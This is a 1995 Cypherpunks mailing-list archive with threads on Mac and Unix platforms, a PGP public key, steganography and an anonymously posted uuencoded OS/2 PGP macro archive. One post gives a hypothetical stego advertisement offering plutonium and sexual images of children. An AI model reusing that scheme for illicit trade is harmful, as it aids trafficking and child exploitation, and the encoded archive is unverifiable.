I've been a Macintosh user since 1986, despite having worked for Intel for 12 years prior to that. (Actually, I'm a fan of the Mac OS and Way of Doing Things and don't care whether the main microprocessor is Motorola, Intel, or Phlogistonics.) For many years the most interesting--to me--applications came first on the Macintosh, then on the PC, and then only occasionally to Unix machines. Apps like PageMaker, Adobe Photoshop, Illustrator, Fractal Design Painter, Eudora, MORE, and so forth. Things have changed recently, with Windows getting the desirable apps a bit earlier than the Mac version. (The Mac versions of the products above came first becuase of the obvious graphics and user interface consistencies of the Mac, and the user community in prepublication, journalism, and art environments. Writing for DOS in those days was a real lose, because of the lack of a consistent set of standards and toolbox calls...) Only one program I use a lot came first on Unix boxes: FrameMaker. And FrameMaker hit the Mac a few quarters after first appearing on Unix boxes, around 1988 or so. I'm not dismissing Unix boxes or Unix tools...they are obviously very useful for running the Internet and the various tools that access it. Enough said. (And SGI and Sun are doing pretty well. The "vanguard apps" that run on these machines, including the well-known imaging apps, are not things I use.) But I think the point that PCs (and by extension, Macintoshes, which are a flavor of PCs) are never in the vanguard is wrong. By my interpretation of vanguard. (I expect a quibble, this being the Cypherpunks list, about whether Jon meant "the majority of PC users won't be in the vanguard of /anything/ -- it's not the nature of the PC industry" to mean this...) Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even recollect who was who in this battle). Maybe it was the News vs. X vs. OpenLook vs. NeXTStep vs. etc. user interface battles. In any case, I expect Windows (and Windows NT) will take an ever-increasing share of the market for at least the next several years. I'm hardly alone in this expectation. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From mark at unicorn.com Sat Jul 15 16:17:51 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Sat, 15 Jul 95 16:17:51 PDT Subject: Deployment Message-ID: So, anyone want to volunteer to port Privtool to Windows ? Mark From pgf at tyrell.net Sat Jul 15 16:25:04 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sat, 15 Jul 95 16:25:04 PDT Subject: Unix not the Only Place for "Vanguard" Applications In-Reply-To: Message-ID: <199507152320.AA05094@tyrell.net> Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even recollect who was who in this battle). Maybe it was the News vs. X vs. OpenLook vs. NeXTStep vs. etc. user interface battles. Well, it looks like there will be a major Unix mainstream again with two branches capable of more-or-less running each other's binaries without too much pain: FreeBSD and Linux. In any case, I expect Windows (and Windows NT) will take an ever-increasing share of the market for at least the next several years. I'm hardly alone in this expectation. BTW, I hear Linux can now run Windows 3.1 in its DOS box. Phil From pgf at tyrell.net Sat Jul 15 17:00:22 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sat, 15 Jul 95 17:00:22 PDT Subject: Finally got pgp... here's my key. Message-ID: <199507152356.AA07171@tyrell.net> I know, it's not really signed/verified, but it'll have to do for now. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAIbBcAAAEEANGhGNu6EcmxoqUC/1dHz+ZJinZIXJ1tyrsGdw2vR76uymqn hYGIzxFTAvB2WMZMko/6VEYOLXF8i6CUrZOg/ojzbExcaS9wYeBsNzY3FsjvEbfI v0kSIn8bN8YTdUO/OQ1HBgMUvUAGkTaac+hbM9Nxsj1mL8yCM+DFwYBSGL/hAAUR tCdQaGlsaXAgR2VyYXJkIEZyYWVyaW5nIDxwZ2ZAdHlyZWxsLm5ldD4= =T1NA -----END PGP PUBLIC KEY BLOCK----- +----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+ | Phil Fraering / \"The English Hierarchy, if there be anything unsound in| | pgf at tyrell.net\ /its constitution, has reason to tremble even at an air | +----------------+-pump or an electrical machine."---Joseph Priestly------+ From cp at proust.suba.com Sat Jul 15 17:19:37 1995 From: cp at proust.suba.com (alex) Date: Sat, 15 Jul 95 17:19:37 PDT Subject: Unix not the Only Place for "Vanguard" Applications In-Reply-To: <199507152320.AA05094@tyrell.net> Message-ID: <199507160024.TAA05082@proust.suba.com> MS-Windows boxes and Macs still don't do multitasking well; that's going to change soon, and when it does, I'm sure that a lot of nifty new tools well appear. But multitasking is important if you want to run servers (like remailers), and it's very helpful if you want to tie different programs together (ie., elm talks to premail which starts pgp 5 times and hands the result to sendmail, all without my noticing). The preeminence of unix in a lot of the work that's being done isn't the result of snobbishness or even personal taste. It's just a nice, convenient platform to do the work on. People pick the tools they feel comfortable using, and they match them to the job at hand. I can't run Pagemaker on my linux box so if I need to do some layout work I use a mac or ms-windows. But if I want to set up a web server I use linux because it's quick and cheap. If you want to edit a feature film, use an SGI workstation. If you want to set up a word processing system that someone from the temp service will be able to run, use ms-windows and word. I'm sure that when windows-95 comes out officially, good tools will appear for that platform. But the lack of solid multitasking and freely available development tools in ms-windows 3.11 is the reason that more robust crypto tools for that platform don't exist, not an ivory tower mentality on the part of the people doing the work. From jamesd at echeque.com Sat Jul 15 17:29:04 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 15 Jul 95 17:29:04 PDT Subject: def'n of "computer network" Message-ID: <199507160028.RAA08597@blob.best.net> rick hoselton writes: >> Perry, I don't understand. If the least significant bits in my gif file >> follow all the "known statistical distributions", how can anyone know >> whether they are "just noise" or are an encrypted message, Perry E. Metzger wrote: > Indeed -- how could the recipient even know to look, Assume we have good public key steganography tools (I am not aware of such tools.) The recipient would have to scan a large pile of random pictures in the hope that some of the messages, when decoded using his private key, decoded into a correctly formatted message. Although prearrangement is needed, otherwise he would not be scanning this pile of random graphics for secret messages, he does not know whether he will receive a message or not, and no one else can know if he has received a message or not. For example: "I have plutonium and bondage pictures of nine year old girls for sale" My public key is 7uL623uvGjg8N-u7hO789HcysFhGyvcAgyh Interested parties should post replies stegoed into images posted on alt.binaries.pictures.erotica.blondes.dinosaurs.oral.fetish.waifs Please use only new dirty pictures to hide your message in -- not images I have already seen. " Then people can post replies without anyone knowing they are posting encrypted messages. -- ------------------------------------------------------------------ We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state.| jamesd at echeque.com From jamesd at echeque.com Sat Jul 15 17:29:11 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 15 Jul 95 17:29:11 PDT Subject: def'n of "computer network" Message-ID: <199507160028.RAA08617@blob.best.net> At 04:25 PM 7/15/95 +0100, Andrew Spring wrote: > If your attacker has a more sophisticated statistical model of noise > distributions than you do, then he can deduce the existence of message. Since each hardware scanning device, and each image source, has idiosyncratic forms of noise, it is much harder to detect unusual forms of noise, than it is to emulate a usual form of noise. The attacker will get a huge number of false positives. He will not know if there is a whole lot of stego going on, or he needs to adjust his noise models for a whole lot of cranky and/or funky scanners. -- ------------------------------------------------------------------ We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state.| jamesd at echeque.com From an250888 at anon.penet.fi Sat Jul 15 18:02:04 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Sat, 15 Jul 95 18:02:04 PDT Subject: Front-End for OS/2 Message-ID: <9507160037.AA12722@anon.penet.fi> Here is a front end for integrating PGP management into the Enhanced Editor that comes with OS/2 WARP at no extra charge. The integration is via a new PGP menu bar item that manages PGP commands with mouse clicks and hides most of the offputting command-line difficulties. This file does not contain PGP itself. The package is a macro only. Enjoy and imitate! table !"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 666 GCPPGP10.ZIP M4$L#! H %&I?!VG[NLNAUD7-6!!BP "Y3 + 1T-04$=01D4N97BM? EUM M^/<-,, @C (B.@%-"BR*VI,-&&9&:D(%! UM;$C##!_86:<&;Q843=[[M M_Q/FFWO//=L]]YQSS[W?_)2D7%6XJ8O&2)+$U/+UFRA&C#M M)%]IB6 #H=/J8 GF3*N#) B95H=($#RMGB-!T+0Z5(+)J3 Y1E)'2G!6M'#\M MS)1ZGM2,H%-3'ZG at BZDD_589N_A7!"-33WZH(O3WI]11$KP]I8Z6X*TI=8 $M M;TZI R5X8TJMX<2_GM*JPWCK9]B:RUO_A:UPWKH76Q$2W#.EUDK-_A+@JHIV#GU5P+=/@6W34'!%&1-0?H4I$[]C:#+IF#)M M%&BGX-1E^.(RC%SFT('+!(2)B%^$A9-0IR QDQ"M MY"3X3D+/!'1-0,<$AQZ8@(\FX,\3\*,)^*\)>$A ]TW ]R8 )B!O FZ=@/4"M MNG8"5DW #1,P/@YCXW!^G$//C,,7XW!H''XS#B^,PW,"^HMQ>&H-0.@[KQR%H' +'P5] ?<9A^B(,781?M M7807+\+S%SGTF8OPLXMPST7(O0BW7H3U KKV(JRZ" LNPN=CT#<&Q\8X]/ 8M M](S!W\?@X3'8/P8_$- 'Q^"^,=@]!MECL&(,, at 4T=0R6C4'H&'1?@(,7X),+M M'/KA!7C_ KQ^ 9Z\ (]=@$<%M/4"[+\ < %678"5%R!+0-,N0/(%"$?:\_#QM M>?CP/(>^?Q[>/0]/GX?-YZ'L/'Q=0#>=AX+SD'P>CIV#H^?@\#D.[3D''>?@M M+^?@SG/0<@[N$- ]Y\!Y#LK/0<@Y"#H'@0+J=P[D<]!_%IXX"X^=A4?/"LW.M MPOZSL.C\-(H_'(4]H_"OE'X3P&]?Q3VCD+S*&P=A8I1*!?0DE$H'(7<45 at XM M"M&C,&_T;V'2?,F&0^_(F$2FSNC], MA3HF5X(LS2?IM?C ^W0(?G]EW)[QUM M)DQ>(*D#67,@@]=QL%$,_OK,PTB1(4E^\!)"?^@'+YQIA8?.[$.&#YQYQ$^%M M#.$;9Z#A-%A/A_G$$0L2H-8PQ#"??MW/GS!J3OO*8#K=AJ-026TCMC4,;C_=M MK&%:=1"G@>VGD_0GN5R$PFW8D]6P[;0ZF!ERU;#\-"2?AJ6G8H.1GV%I[^4 4+3AOU2#+_-$*T$'U:BZ at PDK+T0[C]UQ)RPTQAS7/8="%F-_EG V_4<,G+H*/%8(/\3M\M M!L%[2/ ;M6L&[V#O;VIXXY0ZE!E.J0GT&H(ZU/"B%^AY! VIH54!P?>IT1S*M MX,%36K at 3/RTH)@3%W8%MQRFM>T%V(V&\/UA/M<*64[0 at Q:>6^ON1N=\\289^M M[F03/I\^R9<%!3UU$@W_Y,DD_3?]<9YH='CD)-G6[(^SH.X/J0L/G.23N^^DM M%AKQ8S[9A$/5)V'G26YS-$$( ^-)HWY. %^U'Z\&-&7!G#RE"]H[E%?T-SG?N&:>^@7_C3#$/Q"M MIPG at TPCDJZ:1R-PA3%\? .=/J,.8P1$ O=3 !=7?&] >9EWM M<('T/^?]A\3 at KWC'R3NPZ403/M><@%4G8.4)R#H!Z2=PBOC'/P4DKH X$M M509"FQ?H7PAJ#(0/1L at 9!>AM!-T;"&]QT.T!I-&;"#H?2"L;(*&5L%Q [M MHL54H045?L^1<#5&/+F!KR-,#"?I?ZJ!B\.QQ"!3#F84E&AON#!,$3(VO78.M M^Z-F?E Z6BC+)Y2AW\D2G!NNT'^J at 5$D^]?POD0N_(-A-)]=!?\87J/7!I$IM MR>>&6R7*(<.Q=\++P^1.SP_SF08Q3F6("C+\48-_B3P9/(OJK J"9X9;X>?(M M>\_P/D)"#HL?C9.@<5B-;N4TA9=%_.D0[R59X$A'>M M"88'AN#.(0IJ:$'9._"S'3^WH0X$R\9VNA"/_D""4H>0.UIG^= :_>G at 9BSGM MDY'1L6 ESV$9C-W30JDD!7<)XD:&0.*0VVT3$ DAM,E at X3\'>]M"P&^(^ZF*M M*T at I\_-!+?0-NGKO\1;\=K )GR\->BOUPJ 0]-S@&OWC(3)7^QR=^#XCX0"&/PA$ID,$/9!"!0.PBV#L'X0;AJ$58)&M M;&;98EQLTOL@:Q!#+8QEA+% \C0_K))1PW#6%,["Y 3)!K&#Z)S:UF]"S&!KM MIAQ!D]B'K1X\2'D1- I2 "*5>'J)%.EE'B/P7P;440S^/*".9O"G@>9Y/-O$M ML*6AMM#TYAB,Z?DLDC7/QTIN ./MURC0$ HO$5%S%--O#<4AC-47B)ZPGB.LM MGR)6?2@\05B&I:&)SRYEC4:0'IM(#]4AW'X+Z!YCBTJWYK&-PP0"ZZ@!7!8C3RM MYC!L0@(IQ)!! '7YX,*!)S]2J7D'8FE8A<.)82 /T(8P_3F5KIR/%BY_SKT^M MEL'DYS)*SXAD?MBKT!>$&9"_2Q?#X5##[6$PW4\UT*DP&*(&#/2+%>_O7Z/_M M61@<%UW]@V$419_UN^+I2+\6VO%SL!]C7>*Q]8F"^FD8?*PP^1"9O,LIWW-3M MOHM43^/GJ7Z1J8)YQGFB/TE_BF/>Q3&E2 9W]I-%J635SYE+0]]!LEU\&"KZM M*9!+^I5 QN2VH7_)7'<]I$=V:^;R\,[OI^26VT]5T"W]L<2M<2Z$]X-?/_CVM M@]P/E_IXG(H,-]F71./C?;%*%:M_=2[EA(L(?W4N'.N#SC[HZ(.#??!1GU<1M M_B&._WHN_%.A"Z:\D"FCN[_?QQWGO;Y_P[M]Z/]GU!3M;_1I,9G :WV80;2MM MD?#[OE9X%3\_Z=M'&@:&PX_Z>!)]J$\+/^S3$AK5'UGAI-+2?TH&6/DH(/ HQ9LQ]^YKFB$BD#:,2]36&2U3*]BD[..Z0&_NHNH:"M MOBR?<#:7RBS0]Z&SI2+V=#AV<3.#Y:Y1;"_K$X&/S:0^W+"6D)G"(;&OE5C'M M$VA1GU%_/!SB^B"VC^)4R_X=_FEX.L3TS5/A!OCO\$2(ZGMX+ at N$R#Z,=JFOM M"9E-'.)S&D]@?'W6K_XSCJ^'?DNBL"WCG.U7[Y.*GPO%N%M M9X_'>JGQ"U+C^TC0&P$/<@):L1>8%E[&S_W'N"C'M M,>);?\S%=]SY#KU88W/49,MCY69)^LQ86<9JXS_AL8C]#JZHYO?39U5:]?!3I^H_BM MLFGATZ,NJW0?]:QQYU&WL=J/HK$.(O*/M?#)4<[^XZ/(_H]'B?VK1Z]F_PJQM MOQ\IL*1??Y1XW"SHUA+=$DZW:!:Z.**+1+K<2#AQA.RI+/GP$5KR<*[9X!&WM M9I\?X5S[CB#7CX\0U_>/S.0*[QU!Y=\]DJ2W1<+?!/H]Q!GN)B(+)ZIU$U4?M M$8N^82Y4'8G%!'/;D7LCW0EF*[)Y-)(GF IB6W:$BFNJGJ$$"8L(5H at XCT3QM M;0L3R]>.4-[:<(3*#OT12C6\0NZ-U,SC%;)*U GQ2#06274%9F7_>02:.IRDM MQQ:5&LS0&YE(Z>;2X23:2R<.)]7JU\^#-P^3RL\=IHKOZ<-\"A at +3QT64W@DM M"CX_1 B?'"*$?QYR(3QSB(IZ^-XA7C V\%&K:Y0.8O6'DO1[Y\&N0ZZL1D+-M MAZ#Z$%0=0@<5R>RV0U2ZP)9#O&2)A,V'6J'L4"O=-7S]$#\W0/$A+6S"S\9#M MKA6C0J$ >Q%*BIKK+A1():*.>0RVME>M M]),H.-/+B^C>WB:$=?2Z9MG6RSG @5X7_K][T;G>[Z7E at 7V]7,$'>[5@[Z42M M"O^*P-:+7L:M8A%,M_62<7W/K=0>UTOO_=9VZO<^Y"-UB"^,QI6];HKW&R$C$6YKE%68$\3#3&]Y!)EM MT02*0E!<-/AZ at 50(RHB&_D\]H&.?)NGSHN$#+] _$%06#2\0"'[\*3^$_^A3M MOA/#=S[5PK<_Y>M%!*]R D""^Z*AE/-X at 8-*$/23:,CP J4AZ(5HN-!#;/MZM MB*VR+_ZN1PO[>OB>#3VT9SMZE#V;7&EW3Y+^:#2?*!K"BKT+T6#IH9-N?8]2M M6>_J,>K]8L01(8A1"8ZH9D1='T/%>$V/J%A-*.A;/;P:@=NQO;U'S 2/]@_$M M\/LT)#%SDJTX7*&@EF.[M(??8WE02Q#U 8Y:A,.%"NK7>OB>O;Z'[]E+0B5EM MO6]&[&=B<1:=WR,_H8*HGGLHZG "D3T\ZB"BAY?I-.V)F$1*M MAW-[6J4@?IX,11%/S(>);FCOI at G P6XM?-C-EPXG\:]N6J)_=M,;F0^Z]\(KM MW5A;P*^ZX<5N>+X;GNV&7W0W\\M4+3FZZP-W=+ON>R*9:G=S]SQF:\9*;P\RM M;^C.%?4Y.+J3].?F&\;F&YZ8C[4]3BU8R at Z2IFUDM 19%E;?C5BQL6!#Z99NM M;O6Z;K(Z[.JF=/M_NNG=D+E;'2IQZPKC5W>OT9?&0F4W3<+83;EX1S<-\%Q?%="=1.XK:D=VX=Y at 7B&NY(HCHIGU5X,[M_D@%H0(WA-I!A-OJQ at WLII=GM M00QGDD at X 2CO^06@)LLW1R_6O[8 _MI%Q="?%\ CU*"M]7M==)%Z?Q?2CWYB 7RG2\'Z-F)%Q %0'YJZU'AZM MB8F#!FIDRGC\LW:1)T-]%QX0NK3-84K$"7\R(;$N3D1<-%.\ 2J[U#'\X+VEM M2ZO&0V!Y%QX%M7C6CF42'M]*N]QN\=VXX3AOMRCI:H-"Y#D0AV=-^%J73(Q"M ME1!@HG$8?@M9\T*6$D&._>22O-4*"J2Z1]8"!]UJADS_& AO$T-^$NG.I[!6YWJ!$[VM M9B?\MA->ZH07.D-]U8FL.1'+DSOAKDZXLS/4M M3[T8CR@$"U6IES"XHY,F#96=S4N8/Q@[[\$1?TSEG?[:)I2WO1-NZX0MG5#>M M.5MBN;73E5ANP,2ROG,1L\'- at KFM^0;<<'&>JSMSU4FL.0DCLC,)#0 at K.]&KM M&Q:1_EEBVIF=E#4R.NF-,IEN$3I[6N<:_1.+L,E[*9WD^HNN6 #DF8RS'5Y$M MQNI=U!R/^Y34G,"0#^WGRW"L=Q&\V:%>BF;I:,+GTQV*T0V/+20%GNIPKQ[(CB>@>[\ \\R!#1O!81Y(^$MU,0H/C$!K?D,D'6CO$.1K!N" /=_#=$(>)M MZ?X.?O9$+U[&=.P^EMZ\#+TXF34GXTQ^T+%&7TM-WOM^!_D.[^#4L.IC\$ 'M M=K0*;!F[2V70L414$C4F/6G_HS?@]Z-FKV+6[H!;.N#&#N4E&*SNP(B68!6.M M#B9 9@=_*2^N%S,0ULL at Q1NVO,.H/T$MM1_GNJA#J]9*35HI3$Z4*O4LGH!AM MLP$#O(%Z1P+?=OTZ4+BV%7S<%L!:)7Y70CI&=99*%!]R!V;!Z78\!\<;#/$(M M.0B7VROT5J5WD[Q[LGT.VSW>'LJR5;3*M"NWX^J+/>%\>Q)]G6U/JJ7O,_BMM M?R/>54">:B=[XI'\S_&&M^,-=], ?-'^D8MZ1% /*=0#1#WNINYO)R]#ZDOQM MAFEB at .GGE\KMXV'4.":!;LDQY]>>"&^U\SH D^.;J#&\T6ZD]NO4_D,[NN2C"=3_[W8MM MRH-7VN&E=GBA/KIXG&=!'?D*-YGD2_!@'U(EP=SN<:8.1-I='#;7MI=&!MC7TU=]6X:/?M MD B_;T/F6GBU30NOX*>QC1\'C6VTY7S#14L$V]IDY-\4P?T$]Y&F,-&*9$USM M16L>'D%$*XJR'FQI2]+?F0 at WM5'AA,%Y(_;_D$@A_K-$B&GCYX8H+L^ 8)3GM M at PK(;>+$,WV0GW)P_[E\,$G_.9$A#QDFL=>5"!T'B>QS3M9V4 N_$^BXO;V"M M"#&+%72DE^%EA 0MAH!"16H:&@Q7ZO,7PK8-D at -L.NHRWM M]>!>J, /!BZ]!:?U*T1Z-$V45(1[;I&,.;5(AH*#KI< NH-K]$\N!OD at 3[!3M M![30?8".+/#. =K(_WS 50R^=F O,H'?(\;O\//* 2WRT\++V/[5 ?$:Z45LM M_Q*I0]@=&%FM]"+HYP>2Z.NI ^CX1Q<_!D\<(,S6ID#EMA at 559F8*C5+E;K&M M-VO]#9DRD]?C!T'5,O/3E986E_IEKEJY::AG+VVPQ[JPS,:>5M M55KK;74FIXF3V$V[&TP.IZF*(:[9:DECK!S!B%-OM%0A1PNR-5EJG+5LJ0^RM M565F!MIJ;-6F-&>]3@*(69S"C5M M'B]K%N19&^JJF,7J9-5FE.2-%B^OD#,8TH*UP.6=>QP!K-QEWF9BCP2YL766VFRJ=5CM at S^A$&UN<1K/%P6G,#F:VB F4M MY)1O2%-I-'(:R4C3;=6Q)J.#*X HQ,AF=-:FL)T-3CY0;6U M7!(7NE9D/V>M M];8W<+4XHYVF2F.#P\3,)-XUK9TF#P]A6RZ%]&!6.T&1G'KQ&LW_?D:SNT@&M M+8\DETB^VW% WHY-7T+WX3UY+&,"7_M:M M8Z/)DN1DQJHJ"E\+>#FO X\#SGC&=&(Y:AM MV>'D#)U6BR--$LI)DKQ;DK-4F1DR?LE21!D7SXQ>,E2K^3C^KUJ!*-%>JF_$M M\!$4F%(08Q4Y)GY62 at MY0EOKY7T8K49,1CL;JJM-=AY0J[*S,U9H2*]DMQ1O36X3^,=Z=]!:OB4C"D)FKY'A?R3KNQS>1I5<8>[*3+F3YH L6=@D at F:IYF;7"BK_"Y(6Z"7^JN1I; IYPLM M+\=/AKQ1="S7E"L04M M3KM<@.H;ZIQFS/8@/BV5BQA_">Z0DQ7>::LV5M=[I&7,#)C"TM M-RX>ZJ=:E8$9#-W)!RUT36]" :X57CSKXGH$\ 1T[=5E\NV>-44J,0U)K**:M M5A!#E0R3$515%"F8WFZTO("?4%>3KDN3:Y:I*LR*^S)$PUN"NZUBKT:C2-&L).Q\E\81NM"AHM M&" X6Z/3::JW.2DSH3F,E-O(#4AC[*M%_N09]?HJ+"FR\H7A at 8#;B88'0M M:I26)J]8DEYJ&.8.>NV4'M MID"E&J0$F*E:E4UJ7=?WYVLT^=;9/7[)1E*5UL]+5^[W6*&(70[1KS/IU[?DM ME!9A3;"6Y2"1>_)?QO$*UQ2%WY:"\@W%F\N9T;&+NN;J&3K3LIB,F,X0/PVCM MN;"L.(5GGV33'LS!2)',=AIYU-0;Z]";ZDVSZI"O*]25Z_+CK[N6-RMYCC9[M MD>:\M=U99ZW<1;*;<*C__FX at R$6(DM MTUI9V6"WFZK6^OOK"+A6^.MUN!8H'*M=:G.5JXSU:&"^QDYCO0V-7X7KB@ME01B1G':''8K'8LJ>SU%)U.N]EF(T^K-J*4*M7*C"^;*FU8M M&GE%H-NJ4;G&JBNR(L_>JJP57\(K5YD at 9>,J*U>9JDN>*KTRN at 5/FB)DJA (M M-J=P-9Y(%OE?GUBU at LK*ZWCY#B?V&QYZ)"B 47V7FM MD=!DM>_"T!-ET97XRD$)E]^)^,8Z:PTOBVP8>^*H+.HOI>QU17>5E3-68MQIM MAYE3-8F9RKMC7*O(R.)>\-5$)']UG1=_%1-4\$J"B at ER13PVM M4$EAK*L#-"H7C6;E at AD6!MY,ZFE?Q#SELKV7LF9GVLK_S9+)N^>1IY O42+SM M4*BRLKYL5T67IX,Q%66KQ"?.G[8L=RWO#G>"%N2KLFZ\ON=G\/TJD\>2.Z*BM M#5;K-0)II9P5F;[9XK':)I%FW?NCUK-GNB]:TGQ2G\/8.EV]@!],]S_R\ ,K' _AUK#JWI,Y$[,BWC35&LX7?M M9>R>K[F6YZ6I4BMEEN"Q:0,W!ONL6UF-%!,>; +627Q=I$]V*>JP]0M MBE;3'E-E Z_4<*\I+DO/HDW+0:RQE$*CI(AK$?<=2+KK!H&(*ZUVNCP1,KT+M M>0$FN$Z at N:I3'SR.<2^A?H9L4B4P$74$].Y4BA#3M ME>:4Z>C&QQ-LZ/+_?R*G\G\4KJC?=5+@ H?5Y0W<<\6]CC@=Q,N:V'+72<%=M MI"2+(V!^, at 9A@$B*:UE$J-]%W%#2\3P$@LX "Q8-GOQ6+OR+[L=14M ME^0F(VXT:6G^.F%27SKCJ5(=PBDH'>F*KIN.9.8K)+_)B\DI-.=A,;*?9Z4CG?GJUWR:3M M+E@!-=@I4>&2<2.1OXCJ2+G3X\O'Q7Y9T9W7X9VYDVC(%_H-5NO+)1OJC;2.=J_L*"L/+=X:]SM7%'*CVSI+)G(V<%'T[7RB+(M M6EQCW<9R 8L\/I<4-AL"(W=VT*4.YYS"2"NN%+][4:;BV;N2 at +M/KM M]:)F5$0YA%/PA)A77*0O,*25;RT71R[7:1G3756: NM-1LL5K&G[M M1/;QC.75FO!L?!5/)?P4R1 at P6.5]=Q@]&ZA*>DXC%=19DM M?UZMT5+#8URD,*OW6RY1,G 3%167TVL_3%/*9>N,BH*LQ^?NV9WX3BU.!E9+M M'2^R^/91;[3 at GLU?<-"2-II-34*\W69UF!SQ9"AZ^1+E>1"FG+B)=W+N1B HJ=\Q.D"N#T_6>1(N9.2"]PF3?B6)5M MC8V>9*88T O@,N7_*,/Q.]P$+(^4Y9.3I<5BA=RWZV2/*R[DZ^H"=$7EI=LPM MR"4L(3*\[@C]Z(:P0BQF?Y[5ABK4U#K9TLIE+//&&U=BK>H*J3PL6AI($J:0M MJH9*IT-#EU8-4&82Q_-274[^)IUX4V#EET<>4VDT7[/6M MHIII*%=4E>SF6>K+]8MR^-7M-?4,V5)0M$E75I9CT*&]*-GGY!9O+O=RG2JSM MPU:'X5QKJK-QU]%0H6D;MNT!66A-)\\W=0<\=6,B*46SD/,55?C+, at Y*4.X/M M EMX%]G[K%ZSPF=U!C\/Q1-GU&$&H4MYGKQHJV0MU$6Z+$&GRERME=U85AO=M MHU/F\G/A92K\5^*>A=T,T17*&O@== T>6UB5K-R0X_JYKLV-W&%Q)91*A#DS=5>6S>O6-KDFN=4ETH,02$SH(M MG?C11QNMNTSNH\NL0J))2"DBMGAA*OS7N/A[SG=MY'5KRG<(XS6%M MQ0IA+8+>38;B[ Z4M]HE3^^1YY#=[PPJE7<&7]F B[@!9Z'?R*=((E>Y1-[BM M-479_0:#GVO=NYZ2/&>5%-(ML=>+=Z9-?([E=1L[^$FE5>%)?G]1)+V+0&A62YA.127JBJHN+?M M*/.WS/33&+H\Y@&@Y"U1O\_R(H&F'<7?3F\4X[A%$0S%&%%,ICL9S)YU2O$NJF?5"#.V>HC"QU+0HZ*A6M M8Z7/ZE7N.+G)S;M15O9 at LA8?+&"N]?8'S5EC/M MY('':D>*5\Y)$=$G]N5&I;:)=0OBD97NJGE0%HE:<87=;5_-[C,5B73+4"A=M M=L^ZPNZVZ]I])M,(-U-1N"EV]SAPXG58N6K0D!:.HU1E2)XQ8Y/+OM';K5.HM MP.190Y[QZX$KK"Y^.!#:(FH_#^]L]VS=C!SR-7Z&,(.1J"J]&'GFF#VK)OS=M MXFRUN')<"5.(6A26N"MDNR:>D40GWSI[29.LXWG1?6#FKHKUG7)&#A5'Q1;7M MN,_JE:X*(6,9G5FJZYRR(%CH;N ZJR&;F&JQPM M;_E+B"M."[U=G*'$WL$]V>/F82UBL,P%0!8S%2,657*^\LJ C%7E52 at I=X-AM M+2X$Y38=VLT[^TYI6JZ=M!;U*L#C,EM MU3 at 7"<^M5P=]EMM[UGDD[7$+\MI KR\GRD7AY9\H8@]*\+A5AESL3O;DAN:KM MI2!+K\G%MGBKCV->$T#.,W8'2EIT<<92*V7E FWFQ1-=X2GW[7FS7V#&MLP8M MT+D' E/15)GN_)CF%N4PN66YWKQ?+332A=+"MV3$"41"9#BCM%88BB+M*AXAM MHOBBVP^P%M>0X$#2/>LR3_9,U6L_]A"AY4D\$KGC.907M M]1YDWQ;LNP;E55+(=CO.UF$R5:7M-%N"MSO$=D8_20S>;A,Y]JJ..%?2?1A+M M-3K)*FSY3G2\Y;C>=$/&EMN,ZRH)T(@9?UV&\HO)3'_^LJ&LS%]YZ>!/EQ>ZM MH at K^KPS2,6Q'<4DY']V1MRF?CBD[],6;B_+Y$!%H^!"_-A&'+^47F$'447Z%M M*0Y:FTN5'V/R(:4=0#>&]+/,0&ILU&TKR ^@NY.2LBWY@=3P@ B+B\@KU.64M MEBGRRG5;RS<5Y^NX:CFEFXI+ at _)U^IS-A>5T=M/DY)475.AXLX*N[KG.O at 5%M M!>6!>$HL)_9E]$.T-%5IGJXLUZ at -TU3*TJ5I3:5*FICVE4:D+Z9#I,O2X#3]M M0Y"'^/, ?_Z=/__$GR_SY]/\^2A__H _[^7/._C3P9\U_+F5/POY\Q;^7,F?M MR_DSGC]C^#-L6H5/'_Y4CP9*#[%39P*EC8O_>H8 at W^;/DM,(C\D]2>VZ$X%2M M0.R-(]1>.$C/F([_"U!+ P04 " KJ7P="MPJS40@ !V6@ # $=#M M4%!'4$9%+D1O8\4\:W?:2++??BUJW>]%MM M>,^?/7P4#8=)+&K);+[(52JZ:1(N at CP3,$ TTB3.#[TXW#%P\_-9I5D$<-Y4M M7C]_]M.W:\E\G4;C22Y>!@?BS=G9Z6.O#]>/8O?X'#=IE.M M%0TE\T6JG'EJ23R*QHMT \@UPMS!;%17E$N>GTCX[%?"ISE.D*BIV<"8($RI7"JH'Y44RO K0 90_PT"A8M M"9@#"R7PV+P*/\?P/&-(2%]8V$JI.Q6'&9*RY:<3G%ZE/X(V&31<%=%*UJ ;3"=C.)< :DW5RF>10LIC(U. O\M MU3!?YB).1#"1*3QXF2GF]6-V#I 'G3LHBUD"*LIX6516T12EDG2!<5\"$%HKM M\#*#*12^!\2X4FH.@(5:*X%"A(N(E:]^5\@TM MF(!.@*"L)DFF1"QGP T:D^6P9OB:3T0)C&C)4&7 ]" BE$4";$N+V>8D>S#!M M3YP6"* K* +$3DZ3,1*B6*N!R%KF,!?]\9SMXYU:,X60P'8D+,V(UTJN+3/YM M,\KGSM5E,.,Y46.:)31=I-)-I!,N2.<'9GIQL7EE$M M%3 J.;A)(>?S*3H#ZWCQG\>#MI\[IVWD$+? Q+[D-UG18=5?D at 7I\BA5RM TM MRGGQ:-Q :E4: 218.P at 9=S>: 